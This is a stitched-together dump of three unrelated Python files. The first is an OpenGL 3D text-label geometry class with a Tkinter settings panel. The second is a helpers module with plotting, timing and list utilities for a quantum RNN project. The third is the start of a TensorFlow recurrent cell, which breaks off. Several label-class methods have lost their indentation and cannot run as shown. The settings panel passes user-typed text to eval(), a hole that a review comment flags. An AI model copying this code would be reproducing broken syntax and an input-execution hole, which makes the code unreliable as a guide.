        #glf.glfDisable(glf.GLF_CONTOURING) # C code default value
        #glf.glfDisable(glf.GLF_TEXTURING) # C code default value

        # loading BMF fonts has to be done after the context exists
        # otherwise nothing appears
        self.vectorFonts = {}
        self.bitmapFonts = {}

        apply( Geom.__init__, (self, name, check), kw)

        # make ambient to be same as diffuse
        # NOTE(review): 'mat.getFrom[mat.ambient] = [mat.diffuse, 1.]' looks
        # unusual -- confirm getFrom is an indexable mapping and mat.ambient
        # a valid index on the materials object.
        mat = self.materials[GL.GL_FRONT]
        mat.getFrom[mat.ambient] = [mat.diffuse, 1.]

        self.labelTranslation = None
    def Set(self, check=1, redo=1, updateOwnGui=True, **kw):
        """set data for this object

        check=1 : verify that all the keywords present can be handle by this func
        redo=1 : append self to viewer.objectsNeedingRedo
        updateOwnGui=True : allow to update owngui at the end this func
        """
        #print "Set glfLabels"
        # Base class consumes its keywords first; redo is deferred (0) and
        # the returned flags are accumulated below.
        redoFlags = apply( Geom.Set, (self, check, 0), kw )

        # Each recognized keyword is popped from kw, stored on self, and the
        # relevant redo flags are OR-ed in.
        labels = kw.get('labels')
        if labels:
            kw.pop('labels')
            self.labels = list(labels)
            redoFlags |= self._redoFlags['redoDisplayListFlag']
            redoFlags |= self._redoFlags['updateOwnGuiFlag']

        billboard = kw.get('billboard')
        if billboard is not None:
            kw.pop('billboard')
            self.billboard = billboard
            # Billboarded labels must be re-rendered every frame.
            self.immediateRendering = billboard
            redoFlags |= self._redoFlags['redoDisplayListFlag']
            redoFlags |= self._redoFlags['updateOwnGuiFlag']

        includeCameraRotationInBillboard = kw.get('includeCameraRotationInBillboard')
        if includeCameraRotationInBillboard is not None:
            kw.pop('includeCameraRotationInBillboard')
            self.includeCameraRotationInBillboard = includeCameraRotationInBillboard
            redoFlags |= self._redoFlags['updateOwnGuiFlag']

        font = kw.get('font')
        if not font is None:
            # loading BMF fonts has to be done after the context exists
            # otherwise nothing appears
            kw.pop('font')
            lGlfModulePath = os.path.split(glf.__file__)[-2]
            lPathToFonts = lGlfModulePath+os.sep+'fonts'+os.sep
            if font in self.vectorFont3dList:
                self.fontTypeIsVector = True
                # Fonts are loaded once and cached per font name.
                if font not in self.vectorFonts:
                    self.vectorFonts[font] = glf.glfLoadFont(lPathToFonts+font)
                self.font = font
                redoFlags |= self._redoFlags['redoDisplayListFlag']
                redoFlags |= self._redoFlags['updateOwnGuiFlag']
            elif font in self.bitmapFont3dList:
                self.fontTypeIsVector = False
                if font not in self.bitmapFonts:
                    self.bitmapFonts[font] = glf.glfLoadBMFFont(lPathToFonts+font)
                self.font = font
                redoFlags |= self._redoFlags['redoDisplayListFlag']
                redoFlags |= self._redoFlags['updateOwnGuiFlag']
            else:
                # Unknown fonts are reported but leave the current font as-is.
                warnings.warn('not a glf font %s'%font)

        fontStyle = kw.get('fontStyle')
        if fontStyle is not None:
            kw.pop('fontStyle')
            assert fontStyle in self.fontStyleList
            self.fontStyle = fontStyle
            redoFlags |= self._redoFlags['redoDisplayListFlag']
            redoFlags |= self._redoFlags['updateOwnGuiFlag']

        fontSpacing = kw.get('fontSpacing')
        if fontSpacing is not None:
            # this set the space between letters
            #glf.glfSetSymbolSpace(.2) # C code default value
            kw.pop('fontSpacing')
            self.fontSpacing = fontSpacing
            redoFlags |= self._redoFlags['redoDisplayListFlag']
            redoFlags |= self._redoFlags['updateOwnGuiFlag']

        fontScales = kw.get('fontScales')
        if fontScales is not None:
            kw.pop('fontScales')
            self.fontScales = fontScales
            redoFlags |= self._redoFlags['redoDisplayListFlag']

        fontRotateAngles = kw.get('fontRotateAngles')
        if fontRotateAngles is not None:
            kw.pop('fontRotateAngles')
            self.fontRotateAngles = fontRotateAngles
            redoFlags |= self._redoFlags['redoDisplayListFlag']
            redoFlags |= self._redoFlags['updateOwnGuiFlag']

        fontTranslation = kw.get('fontTranslation')
        if fontTranslation is not None:
            kw.pop('fontTranslation')
            self.fontTranslation = fontTranslation
            redoFlags |= self._redoFlags['redoDisplayListFlag']
            redoFlags |= self._redoFlags['updateOwnGuiFlag']

        labelTranslation = kw.get('labelTranslation')
        if labelTranslation is not None:
            kw.pop('labelTranslation')
            # Must provide one translation per label vertex.
            assert labelTranslation.shape == self.vertexSet.vertices.array.shape
            self.labelTranslation = labelTranslation
            redoFlags |= self._redoFlags['redoDisplayListFlag']
            redoFlags |= self._redoFlags['updateOwnGuiFlag']

        return self.redoNow(redo, updateOwnGui, redoFlags)
def getState(self, full=False):
"""return a dictionary describing this object's state
This dictionary can be passed to the Set method to restore the object's state
"""
state = Geom.getState(self, full).copy()
state.update( self.getSubClassState() )
return state
def getSubClassState(self):
"""return a dictionary describing this object's state
This dictionary can be passed to the Set method to restore the object's state
"""
state = {
'billboard': self.billboard,
'font': self.font,
'fontRotateAngles': self.fontRotateAngles,
'fontScales': self.fontScales,
'fontSpacing': self.fontSpacing,
'fontStyle': self.fontStyle,
'fontTranslation': self.fontTranslation,
'labelTranslation': self.labelTranslation,
'includeCameraRotationInBillboard': self.includeCameraRotationInBillboard,
'labels': self.labels,
}
return state
    def Add(self, check=1, redo=1, **kw):
        """Add glfLabels

        Appends vertices/materials (via Geom.Add) and label strings, then
        marks the display list dirty when anything was added.
        """
        #print "Add glfLabels"
        if __debug__:
            if check:
                apply( checkKeywords, (self.name,self.keywords), kw)

        v = kw.get('vertices')
        if v:
            self.redoDspLst = 1
        labels = kw.get( 'labels')
        if labels:
            #labels is apparently a tuple
            # NOTE(review): list + tuple raises TypeError in Python; this
            # concatenation only works if self.labels and labels are the same
            # sequence type -- confirm what callers actually pass here.
            self.labels = self.labels + labels
            self.redoDspLst = 1
        Geom.Add( self, check=0, redo=0,
                  vertices = kw.get( 'vertices'),
                  materials = kw.get( 'materials')
                  )

        if self.viewer and redo:
            if self.redoDspLst:
                self.viewer.objectsNeedingRedo[self] = None
    def drawOne3dTextLine(self, textLine, index):
        """Draw one label string at vertex `index`.

        The modelview matrix is built up as: translate to the vertex,
        orient (billboard / per-vertex normal / shared normal), apply the
        per-label and font translations, the font rotations (Z, Y, X), and
        the font scale, then the glf draw routine is invoked.

        When textLine is None nothing is drawn and the resulting MODELVIEW
        matrix is returned instead (the transform for this label).
        """
        c = self.vertexSet.vertices.array
        n = self.vertexSet.normals.array
        if self.labelTranslation is not None:
            labelTrans =self.labelTranslation[index]
        else:
            labelTrans = (0,0,0)
        lenn = len(n)
        try:
            GL.glPushMatrix()
            # Move to the label's anchor vertex.
            GL.glTranslatef(
                float(c[index][0]),
                float(c[index][1]),
                float(c[index][2]),
                )
            if self.billboard:
                # Face the camera (computed in prepareBillboard...).
                GL.glMultMatrixf(self.billboardRotation)
            elif lenn == len(c):
                # One normal per vertex: orient each label along its normal.
                lMat = rotax.rotVectToVect(n[index] , (0,0,1) )
                lMat = [
                    lMat[0][0],
                    lMat[0][1],
                    lMat[0][2],
                    lMat[0][3],
                    lMat[1][0],
                    lMat[1][1],
                    lMat[1][2],
                    lMat[1][3],
                    lMat[2][0],
                    lMat[2][1],
                    lMat[2][2],
                    lMat[2][3],
                    lMat[3][0],
                    lMat[3][1],
                    lMat[3][2],
                    lMat[3][3]
                  ]
                GL.glMultMatrixf(lMat)
            elif lenn > 0:
                # Single shared normal: use the precomputed orientation.
                GL.glMultMatrixf(self.orientation)
            GL.glTranslatef(
                float(labelTrans[0]),
                float(labelTrans[1]),
                float(labelTrans[2]),
                )
            GL.glTranslatef(
                float(self.fontTranslation[0]),
                float(self.fontTranslation[1]),
                float(self.fontTranslation[2]),
                )
            GL.glRotatef(float(self.fontRotateAngles[2]),
                         0.,
                         0.,
                         1.,
                         )
            GL.glRotatef(float(self.fontRotateAngles[1]),
                         0.,
                         1.,
                         0.,
                         )
            GL.glRotatef(float(self.fontRotateAngles[0]),
                         1.,
                         0.,
                         0.,
                         )
            if self.fontTypeIsVector:
                GL.glScalef(float(self.fontScales[0]),
                            float(self.fontScales[1]),
                            float(self.fontScales[2]))
                if textLine is not None:
                    self.fontStyleDict[self.fontStyle](textLine)
            else:
                GL.glScalef(float(self.fontScales[0])*40,
                            float(self.fontScales[1])*40,
                            0) # to be the same size as vector fonts
                if textLine is not None:
                    glf.glfDrawBString(textLine)
        finally:
            # NOTE(review): returning from a finally block suppresses any
            # exception raised in the try block above -- confirm intended.
            if textLine is None:
                lMatrix = GL.glGetDoublev(GL.GL_MODELVIEW_MATRIX)
                GL.glPopMatrix()
                return lMatrix
            else:
                GL.glPopMatrix()
    def prepareBillboardAndNormalForAllTextLines(self):
        """Precompute the orientation shared by all labels of this geometry.

        Billboard mode: stores the camera-facing rotation in
        self.billboardRotation. Otherwise, when a single normal is shared
        by all vertices, stores the flattened rotation aligning that
        normal with +Z in self.orientation. drawOne3dTextLine() consumes
        both attributes.
        """
        if self.billboard:
            m = self.GetMatrix()
            m = Numeric.reshape(m, (16,))
            rot = glCleanRotMat(m) #much faster than self.Decompose4x4(m)
            if self.includeCameraRotationInBillboard:
                # this permits billboarding even when the camera is not on the Z axis
                lCameraTransformation = self.viewer.currentCamera.GetMatrix()
                lCameraTransformation = Numeric.reshape(lCameraTransformation, (16,))
                lCameraRotation = glCleanRotMat(lCameraTransformation) #much faster than self.Decompose4x4(m)
                # invert the camera rotation (transpose of a rotation matrix)
                lCameraRotation = Numeric.transpose(lCameraRotation)
                rot = Numeric.dot(lCameraRotation, rot)
                rot = Numeric.reshape(rot, (16,))
            self.billboardRotation = rot.astype('f')
        else:
            c = self.vertexSet.vertices.array
            n = self.vertexSet.normals.array
            lenn = len(n)
            # single shared normal (normal count differs from vertex count):
            # align it with +Z once for every label
            if lenn > 0 and lenn != len(c):
                lMat = rotax.rotVectToVect(n[0] , (0,0,1) )
                # flattened 4x4, consumed by glMultMatrixf
                self.orientation = [
                    lMat[0][0],
                    lMat[0][1],
                    lMat[0][2],
                    lMat[0][3],
                    lMat[1][0],
                    lMat[1][1],
                    lMat[1][2],
                    lMat[1][3],
                    lMat[2][0],
                    lMat[2][1],
                    lMat[2][2],
                    lMat[2][3],
                    lMat[3][0],
                    lMat[3][1],
                    lMat[3][2],
                    lMat[3][3]
                ]
    def Draw(self):
        """Draw every label of this geometry (Python 2 / OpenGL code path).

        One label per vertex when len(labels) matches the vertex count;
        otherwise the first label is repeated at every vertex. Applies
        front/back material properties per vertex unless materials are
        inherited. Returns 1 on completion, None when there is nothing
        to draw.
        """
        #print "GlfLabels.Draw", self
        centers = self.vertexSet.vertices.array
        if len(centers)==0:
            return
        labels = self.labels
        if labels is None or len(labels) == 0:
            return
        elif len(labels) == centers.shape[0]:
            # per-vertex labels: resolved inside the loop below
            txt = None
        else:
            # one shared label for every vertex
            txt = labels[0]
            if type(txt) != types.StringType:
                txt= str(txt)
        self.prepareBillboardAndNormalForAllTextLines()
        glf.glfSetSymbolSpace(self.fontSpacing)
        if self.fontTypeIsVector:
            font = self.vectorFonts[self.font]
            glf.glfSetCurrentFont(font)
        else:
            font = self.bitmapFonts[self.font]
            glf.glfSetCurrentBMFFont(font)
            glf.glfStartBitmapDrawing()
        resetMaterialMemory()
        if self.inheritMaterial:
            fp = None
            bp = None
        else:
            self.InitMaterial()
            colorFront = Numeric.array(self.materials[GL.GL_FRONT].prop[1], copy=1)
            fp = self.materials[GL.GL_FRONT]
            if fp.binding[1] == viewerConst.OVERALL:
                # one color for everything: set it once, skip back material
                GL.glColor4fv(colorFront[0])
                bp = None
                face = GL.GL_FRONT_AND_BACK
            else:
                bp = self.materials[GL.GL_BACK]
                face = GL.GL_FRONT
##         if fp:
##             for m in (0,1,2,3,4):
##                 if fp.binding[m] == viewerConst.OVERALL:
##                     glMaterialWithCheck( face,
##                                          viewerConst.propConst[m],
##                                          fp.prop[m][0])
##             if fp.binding[1] == viewerConst.OVERALL:
##                 GL.glColor4fv(colorFront[0])
        for i in xrange(centers.shape[0]):
            # apply per-vertex front material properties
            if fp:
                for m in (0,1,2,3,4):
                    if fp.binding[m] == viewerConst.PER_VERTEX:
                        b, p = fp.GetProperty(m)
                        glMaterialWithCheck( face,
                                             viewerConst.propConst[m],
                                             p[i] )
                if fp.binding[1] != viewerConst.OVERALL:
                    GL.glColor4fv(colorFront[i])
            # apply per-vertex back material properties
            if bp:
                for m in (0,1,2,3,4):
                    if bp.binding[m] == viewerConst.PER_VERTEX:
                        b, p = bp.GetProperty(m)
                        glMaterialWithCheck( face,
                                             viewerConst.propConst[m],
                                             p[i] )
            #GL.glPushName(i)
            if txt is None:
                # per-vertex label: stringify lazily
                txt2 = self.labels[i]
                if type(txt2) != types.StringType:
                    txt2 = str(txt2)
                self.drawOne3dTextLine(txt2, i)
            else:
                self.drawOne3dTextLine(txt, i)
            #GL.glPopName()
        if self.fontTypeIsVector is False:
            glf.glfStopBitmapDrawing()
        return 1
    def asIndexedPolygons(self, run=1, removeDupVerts=0, **kw):
        """Should return an IndexedPolygons object if this object can be
        represented using triangles, else return None. run=0 returns 1
        if this geom can be represented as an IndexedPolygon and None if not
        run=1 returns the IndexedPolygon object.

        Tessellates every label into solid glyph triangles, transforms
        each label's triangles by the modelview matrix obtained from
        drawOne3dTextLine(None, i), and collects vertices, faces and
        per-triangle front colors into one IndexedPolygons.
        """
        #print "GlfLabels::asIndexedPolygons"
        #import pdb;pdb.set_trace()
        if run == 0:
            return 1 # yes, I can be represented as IndexedPolygons
        self.prepareBillboardAndNormalForAllTextLines()
        lLenLabelsVertices = len(self.vertexSet.vertices.array)
        if lLenLabelsVertices != len(self.labels):
            # one shared label for all vertices: tessellate it only once
            lSameText = True
            assert len(self.labels) > 0
            if type(self.labels[0]) == types.StringType:
                output = glf.glfGet3DSolidStringTriangles(self.labels[0])
            else:
                output = glf.glfGet3DSolidStringTriangles( str(self.labels[0]) )
            lNumOfTriangleVertices = len(output[0])
            assert lNumOfTriangleVertices == len(output[1])
            #assert is a multiple of 3
        else:
            lSameText = False
        if lLenLabelsVertices != len(self.vertexSet.normals.array):
            if len(self.vertexSet.normals.array) > 0:
                # NOTE(review): lSameOrientation and lLocalNormal are assigned
                # here but never read below — looks like leftover code.
                lSameOrientation = True
                lLocalNormal = self.normals[0]
            else:
                lLocalNormal = None
        # NOTE(review): second call — already invoked a few lines above.
        self.prepareBillboardAndNormalForAllTextLines()
        lOverallTriangles = []
        lOverallVertices = []
        lOverallTrianglesColors = []
        for i in range(lLenLabelsVertices):
            #print "i", i
            if lSameText is False:
                # NOTE(review): type-checks labels[0] but tessellates labels[i];
                # works only if all labels share one type — confirm.
                if type(self.labels[0]) == types.StringType:
                    output = glf.glfGet3DSolidStringTriangles(self.labels[i])
                else:
                    output = glf.glfGet3DSolidStringTriangles( str(self.labels[i]) )
                lNumOfTriangleVertices = len(output[0])
                assert lNumOfTriangleVertices == len(output[1])
                #assert is a multiple of 3
            colorFront = Numeric.array(self.materials[GL.GL_FRONT].prop[1], copy=1)
            lNumOfOverallVertices = len(lOverallVertices)
            # register one face (and its color) per 3 appended vertices
            for j in range(
                    lNumOfOverallVertices,
                    lNumOfOverallVertices+lNumOfTriangleVertices,
                    3):
                lOverallTriangles.append( ( j, j+1, j+2 ) )
                lOverallTrianglesColors.append(colorFront[i])
            # textLine=None: only capture this label's modelview matrix
            lMatrix = self.drawOne3dTextLine(None, i)
            lMatrix.shape = (4, 4)
            # transform each glyph vertex (row-vector convention v' = v*M,
            # dropping the homogeneous component)
            for j in range(lNumOfTriangleVertices):
                lVertexBeforeTransform = output[0][j]
                lVertex = []
                lVertex.append( lMatrix[0][0] * lVertexBeforeTransform[0] \
                                + lMatrix[1][0] * lVertexBeforeTransform[1] \
                                + lMatrix[2][0] * lVertexBeforeTransform[2] \
                                + lMatrix[3][0] )
                lVertex.append( lMatrix[0][1] * lVertexBeforeTransform[0] \
                                + lMatrix[1][1] * lVertexBeforeTransform[1] \
                                + lMatrix[2][1] * lVertexBeforeTransform[2] \
                                + lMatrix[3][1] )
                lVertex.append( lMatrix[0][2] * lVertexBeforeTransform[0] \
                                + lMatrix[1][2] * lVertexBeforeTransform[1] \
                                + lMatrix[2][2] * lVertexBeforeTransform[2] \
                                + lMatrix[3][2] )
                lOverallVertices.append(lVertex)
        lIndexedPolygons = IndexedPolygons(
            self.name+'_glfTriangles',
            vertices=lOverallVertices,
            faces=lOverallTriangles,
            materials=lOverallTrianglesColors,
            visible=1,
            invertNormals=self.invertNormals,
            )
        return lIndexedPolygons
def createOwnGui(self):
#print "GlfLabels.createOwnGui", self
self.ownGui = Tkinter.Toplevel()
self.ownGui.title(self.name)
self.ownGui.protocol('WM_DELETE_WINDOW', self.ownGui.withdraw )
frame1 = Tkinter.Frame(self.ownGui)
frame1.pack(side='top')
# labels
self.ownGui.labelsEnt = Pmw.EntryField(
frame1,
label_text='list of labels',
labelpos='w',
value=str(self.labels),
command=self.setWithOwnGui)
self.ownGui.labelsEnt.pack(side='top', fill='x')
# billboard
self.ownGui.billboardVar = Tkinter.IntVar()
self.ownGui.billboardVar.set(self.billboard)
self.ownGui.guiBillboard = Tkinter.Checkbutton(
frame1,
text='billboard',
variable=self.ownGui.billboardVar,
command=self.setWithOwnGui)
self.ownGui.guiBillboard.pack(side='top', fill='x')
# includeCameraRotationInBillboard
self.ownGui.includeCameraRotationInBillboardVar = Tkinter.IntVar()
self.ownGui.includeCameraRotationInBillboardVar.set(self.includeCameraRotationInBillboard)
self.ownGui.guiIncludeCameraRotationInBillboard = Tkinter.Checkbutton(
frame1,
text='includeCameraRotationInBillboard',
variable=self.ownGui.includeCameraRotationInBillboardVar,
command=self.setWithOwnGui)
self.ownGui.guiIncludeCameraRotationInBillboard.pack(side='top', fill='x')
# # lighting
# self.ownGui.lightingVar = Tkinter.IntVar()
# self.ownGui.lightingVar.set(self.lighting)
# self.ownGui.guiLighting = Tkinter.Checkbutton(
# frame1,
# text='lighting',
# variable=self.ownGui.lightingVar,
# command=self.setWithOwnGui)
# self.ownGui.guiLighting.pack(side='top', fill='x')
# font
self.ownGui.guiFontComboBox = Pmw.ComboBox(
frame1,
label_text='font',
labelpos='w',
entryfield_value=self.font,
scrolledlist_items=self.fontList,
selectioncommand=self.setWithOwnGui
)
self.ownGui.guiFontComboBox.pack(side='top', fill='x')
# font style
self.ownGui.guiFontStyleComboBox = Pmw.ComboBox(
frame1,
label_text='font style',
labelpos='w',
entryfield_value=self.fontStyle,
scrolledlist_items=self.fontStyleList,
selectioncommand=self.setWithOwnGui
)
self.ownGui.guiFontStyleComboBox.pack(side='top', fill='x')
# font spacing
self.ownGui.guiSpacing = ThumbWheel(
frame1,
labCfg={'text':'font spacing', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=0,
#max=100,
type=float,
value=self.fontSpacing,
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiSpacing.pack(side='top', fill='x')
# font global scale
self.ownGui.guiGlobalScale = ThumbWheel(
frame1,
labCfg={'text':'global scale', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=0,
#max=100,
type=float,
value=1.,
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiGlobalScale.pack(side='top', fill='x')
# font scale X
self.ownGui.guiScaleX = ThumbWheel(
frame1,
labCfg={'text':'scale X', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=0,
#max=100,
type=float,
value=self.fontScales[0],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiScaleX.pack(side='top', fill='x')
# font scale Y
self.ownGui.guiScaleY = ThumbWheel(
frame1,
labCfg={'text':'scale Y', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=0,
#max=100,
type=float,
value=self.fontScales[1],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiScaleY.pack(side='top', fill='x')
# font scale Z
self.ownGui.guiScaleZ = ThumbWheel(
frame1,
labCfg={'text':'scale Z', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=0,
#max=100,
type=float,
value=self.fontScales[2],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiScaleZ.pack(side='top', fill='x')
# font Translate X
self.ownGui.guiTranslateX = ThumbWheel(
frame1,
labCfg={'text':'translate X', 'side':'left'},
showLabel=1,
width=80,
height=16,
#min=0,
#max=100,
type=float,
value=self.fontTranslation[0],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiTranslateX.pack(side='top', fill='x')
# font Translate Y
self.ownGui.guiTranslateY = ThumbWheel(
frame1,
labCfg={'text':'translate Y', 'side':'left'},
showLabel=1,
width=80,
height=16,
#min=0,
#max=100,
type=float,
value=self.fontTranslation[1],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiTranslateY.pack(side='top', fill='x')
# font Translate Z
self.ownGui.guiTranslateZ = ThumbWheel(
frame1,
labCfg={'text':'translate Z', 'side':'left'},
showLabel=1,
width=80,
height=16,
#min=0,
#max=100,
type=float,
value=self.fontTranslation[2],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=1,
wheelPad=2
)
self.ownGui.guiTranslateZ.pack(side='top', fill='x')
# font Rotate X
self.ownGui.guiRotateX = ThumbWheel(
frame1,
labCfg={'text':'Rotate X', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=-180,
max=180,
type=float,
value=self.fontRotateAngles[0],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=90,
wheelPad=2
)
self.ownGui.guiRotateX.pack(side='top', fill='x')
# font Rotate Y
self.ownGui.guiRotateY = ThumbWheel(
frame1,
labCfg={'text':'Rotate Y', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=-180,
max=180,
type=float,
value=self.fontRotateAngles[1],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=90,
wheelPad=2
)
self.ownGui.guiRotateY.pack(side='top', fill='x')
# font Rotate Z
self.ownGui.guiRotateZ = ThumbWheel(
frame1,
labCfg={'text':'Rotate Z', 'side':'left'},
showLabel=1,
width=80,
height=16,
min=-180,
max=180,
type=float,
value=self.fontRotateAngles[2],
callback=self.setWithOwnGui,
continuous=True,
oneTurn=90,
wheelPad=2
)
self.ownGui.guiRotateZ.pack(side='top', fill='x')
    def setWithOwnGui(self, event=None):
        """Push every control value from the settings panel into the geometry.

        Shared callback of all widgets created in createOwnGui(). The
        global-scale wheel multiplies the three per-axis scale wheels.
        updateOwnGui=False prevents the Set() call from writing the values
        straight back into the panel.
        """
        #print "setWithOwnGui", event
        lGlobalScale = self.ownGui.guiGlobalScale.get()
        # SECURITY NOTE(review): eval() executes whatever the user typed in
        # the labels entry field; a literal parser would be safer.
        self.Set(labels=eval(self.ownGui.labelsEnt.get()),
                 billboard=self.ownGui.billboardVar.get(),
                 includeCameraRotationInBillboard=self.ownGui.includeCameraRotationInBillboardVar.get(),
                 #lighting=self.ownGui.lightingVar.get(),
                 font=self.ownGui.guiFontComboBox.get(),
                 fontStyle=self.ownGui.guiFontStyleComboBox.get(),
                 fontSpacing=self.ownGui.guiSpacing.get(),
                 fontScales = ( lGlobalScale*self.ownGui.guiScaleX.get(),
                                lGlobalScale*self.ownGui.guiScaleY.get(),
                                lGlobalScale*self.ownGui.guiScaleZ.get() ),
                 fontTranslation = ( self.ownGui.guiTranslateX.get(),
                                     self.ownGui.guiTranslateY.get(),
                                     self.ownGui.guiTranslateZ.get() ),
                 fontRotateAngles = ( self.ownGui.guiRotateX.get(),
                                      self.ownGui.guiRotateY.get(),
                                      self.ownGui.guiRotateZ.get() ),
                 updateOwnGui=False)
    def updateOwnGui(self):
        """Refresh every settings-panel control from the geometry's state.

        Inverse of setWithOwnGui(); update=0 on the thumbwheels avoids
        re-triggering their change callbacks while the panel is synced.
        """
        self.ownGui.title(self.name)
        self.ownGui.labelsEnt.setvalue(str(self.labels))
        self.ownGui.billboardVar.set(self.billboard)
        self.ownGui.includeCameraRotationInBillboardVar.set(self.includeCameraRotationInBillboard)
        #self.ownGui.lightingVar.set(self.lighting)
        self.ownGui.guiFontComboBox.selectitem(self.font)
        self.ownGui.guiFontStyleComboBox.selectitem(self.fontStyle)
        self.ownGui.guiSpacing.set(self.fontSpacing, update=0)
        # the global-scale wheel is relative, so it resets to 1
        self.ownGui.guiGlobalScale.set(1., update=0)
        self.ownGui.guiScaleX.set(self.fontScales[0], update=0)
        self.ownGui.guiScaleY.set(self.fontScales[1], update=0)
        self.ownGui.guiScaleZ.set(self.fontScales[2], update=0)
        self.ownGui.guiTranslateX.set(self.fontTranslation[0], update=0)
        self.ownGui.guiTranslateY.set(self.fontTranslation[1], update=0)
        self.ownGui.guiTranslateZ.set(self.fontTranslation[2], update=0)
        self.ownGui.guiRotateX.set(self.fontRotateAngles[0], update=0)
        self.ownGui.guiRotateY.set(self.fontRotateAngles[1], update=0)
        self.ownGui.guiRotateZ.set(self.fontRotateAngles[2], update=0)
|
<filename>src/GradientFreeOptimizers/Helpers.py
'''
Name: Helpers
Description: Some helper functions
Email: <EMAIL>
OpenSource: https://github.com/yesunhuang
Msg: for studying quantum RNN
Author: YesunHuang
Date: 2022-04-02 23:10:18
'''
#import everything
from IPython import display
import time
import matplotlib.pyplot as plt
import numpy as np
class Animator:
    """Incrementally plot data in a Jupyter notebook.

    Each call to add() appends new points and redraws the figure in
    place (IPython display with cleared output), producing a simple
    animation of growing curves.
    """

    def __init__(self, xlabel=None, ylabel=None, legend=None, xlim=None,
                 ylim=None, xscale='linear', yscale='linear',
                 fmts=('-', 'm--', 'g-.', 'r:'), nrows=1, ncols=1,
                 figsize=(3.5, 2.5)):
        """Create the figure grid and remember the axis configuration.

        Parameters mirror matplotlib: axis labels, limits and scales,
        the legend entries, the line formats cycled over successive
        curves, and the subplot grid shape/size.
        """
        if legend is None:
            legend = []
        self.fig, self.axes = plt.subplots(nrows, ncols, figsize=figsize)
        # normalise a lone Axes to a list so self.axes[0] always works
        if nrows * ncols == 1:
            self.axes = [self.axes]
        # closure re-applies the configuration after every cla()
        self.config_axes = lambda: self.set_axes(
            self.axes[0], xlabel, ylabel, xlim, ylim, xscale, yscale, legend)
        self.X = None
        self.Y = None
        self.fmts = fmts

    def set_axes(self, axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):
        """Apply labels, scales, limits, legend and a grid to *axes*."""
        for setter, option in ((axes.set_xlabel, xlabel),
                               (axes.set_ylabel, ylabel)):
            if option is not None:
                setter(option)
        axes.set_xscale(xscale)
        axes.set_yscale(yscale)
        if xlim is not None:
            axes.set_xlim(*xlim)
        if ylim is not None:
            axes.set_ylim(*ylim)
        if legend is not None:
            axes.legend(legend)
        axes.grid()

    def add(self, x, y):
        """Append point(s) (x, y) to the curves and redraw the figure.

        Scalars are broadcast: a scalar y becomes a single curve, a
        scalar x is repeated for every curve. None coordinates are
        skipped.
        """
        if not hasattr(y, "__len__"):
            y = [y]
        n = len(y)
        if not hasattr(x, "__len__"):
            x = [x] * n
        # lazily allocate one point list per curve
        self.X = self.X or [[] for _ in range(n)]
        self.Y = self.Y or [[] for _ in range(n)]
        for curve, (px, py) in enumerate(zip(x, y)):
            if px is not None and py is not None:
                self.X[curve].append(px)
                self.Y[curve].append(py)
        ax = self.axes[0]
        ax.cla()
        for xs, ys, fmt in zip(self.X, self.Y, self.fmts):
            ax.plot(xs, ys, fmt)
        self.config_axes()
        # redraw in place inside the notebook cell
        display.display(self.fig)
        display.clear_output(wait=True)
class Timer:
    """Record multiple running times."""

    def __init__(self):
        """Create the timer and start it immediately."""
        self.times = []
        self.start()

    def start(self):
        """Begin (or restart) timing from now."""
        self.tik = time.time()

    def stop(self):
        """Stop timing, record the elapsed interval, and return it."""
        elapsed = time.time() - self.tik
        self.times.append(elapsed)
        return elapsed

    def avg(self):
        """Mean of all recorded intervals (raises on an empty record)."""
        return sum(self.times) / len(self.times)

    def sum(self):
        """Total of all recorded intervals."""
        return sum(self.times)

    def cumsum(self):
        """Running cumulative totals of the recorded intervals, as a list."""
        return np.array(self.times).cumsum().tolist()
class Accumulator:
    """Accumulate running totals over n variables."""

    def __init__(self, n):
        """Start n independent totals, all at 0.0."""
        self.data = [0.0] * n

    def add(self, *args):
        """Add each of *args* (coerced to float) to the matching total."""
        self.data = [total + float(inc) for total, inc in zip(self.data, args)]

    def reset(self):
        """Zero every total, keeping the same number of slots."""
        self.data = [0.0] * len(self.data)

    def __getitem__(self, idx):
        """Return the total stored at position *idx*."""
        return self.data[idx]
def list_split(source: list, size: int):
    '''
    name: list_split
    function: split the list into consecutive chunks of *size* elements
    param {source}: the source list
    param {size}: the maximum size of each chunk (a positive integer);
                  the final chunk holds the remainder and may be shorter.
    return: a list of sub-lists covering *source* in order
    '''
    # A slice past the end of a list is clamped automatically, so the
    # original special-case branch for the final chunk was redundant.
    return [source[i:i + size] for i in range(0, len(source), size)]
def list_concat(source: list):
    '''
    name: list_concat
    function: concatenate a list of lists into one flat list
    param {source}: a list whose elements are lists (or other iterables)
    return: a new list with the items of every element of *source*, in order
    '''
    # extend() is amortised O(total items); the original
    # `catList = catList + item` copied the accumulator on every
    # iteration, which is quadratic overall.
    result = []
    for part in source:
        result.extend(part)
    return result
# -*- coding: utf-8 -*-
import tensorflow as tf
class HEBR_Cell():
    """Hierarchical recurrent cell fusing user / area / climate streams.

    Written for TensorFlow 1.x graph mode: parameters are created with
    tf.get_variable inside named variable scopes so the same weights are
    shared across time steps (reuse=True after the first step).
    """

    def __init__(self):
        # Layer-size table; placeholders until set_configuration() is called.
        self.dims = {'user': None,
                     'area': None,
                     'climate': None,
                     'user_hidden': None,
                     'area_hidden': None,
                     'climate_hidden': None,
                     'user_area': None,
                     'user_climate': None,
                     'user_area_hidden': None,
